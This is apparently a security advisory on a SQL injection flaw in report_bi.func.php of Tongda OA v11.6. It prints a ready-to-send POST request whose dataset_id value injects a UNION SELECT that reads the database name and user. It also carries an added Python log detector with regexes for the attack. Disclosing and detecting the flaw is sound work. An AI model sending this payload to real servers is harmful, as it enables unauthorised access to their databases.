Tongda OA v11.6 report_bi.func.php SQL injection vulnerability
Vulnerability Description
report_bi.func.php in Tongda OA v11.6 is vulnerable to SQL injection, which allows an attacker to obtain information from the database.
Vulnerability Impact
Tongda OA v11.6
Network surveying and mapping
Vulnerability Reproduction
Login page
Send the following request packet to execute the SQL statement:
POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
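
One way to flag this request in web server or WAF logs, as an added example that is not part of the original post or of Tongda's code: it URL-decodes the submitted fields for the endpoint above and reports a superglobal-style field name or SQL syntax in dataset_id. The function name inspect_request, the two regular expressions and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint and field names come from the request shown above.
TARGET_PATH = "/general/bi_design/appcenter/report_bi.func.php"
# Assumption: a field whose *name* is a PHP superglobal array, such as
# "_POST[dataset_id]", is never sent by a legitimate client.
SUPERGLOBAL_KEY = re.compile(r"^_(POST|GET|REQUEST|COOKIE|SERVER|FILES)\[", re.I)
# Assumption: a dataset identifier never contains quotes, backticks, SQL
# comment markers, UNION SELECT or calls such as database()/user().
SQLI_VALUE = re.compile(
    r"['`#]|--|/\*|\bunion\b.+\bselect\b|\b(database|user|version)\s*\(",
    re.I | re.S,
)

# Body copied from the request above; the benign body is constructed.
PAGE_BODY = ("_POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database"
             "%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&")
BENIGN_BODY = "dataset_id=12&action=get_link_info"


def inspect_request(url, body=""):
    """Return findings for one logged request; an empty list means clean."""
    parts = urlsplit(url)
    if parts.path.lower() != TARGET_PATH:
        return []
    findings = []
    # parse_qsl URL-decodes names and values, so encoded payloads are seen
    # in the form the application would receive them.
    fields = parse_qsl(parts.query, keep_blank_values=True)
    fields += parse_qsl(body, keep_blank_values=True)
    for name, value in fields:
        if SUPERGLOBAL_KEY.match(name):
            findings.append(f"superglobal-named field: {name}")
        if "dataset_id" in name and SQLI_VALUE.search(value):
            findings.append(f"SQL syntax in {name}: {value!r}")
    return findings


if __name__ == "__main__":
    for label, body in (("page request", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(label, "->", inspect_request(TARGET_PATH, body) or "clean")
```
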
This post is licensed under CC BY 4.0 by the author.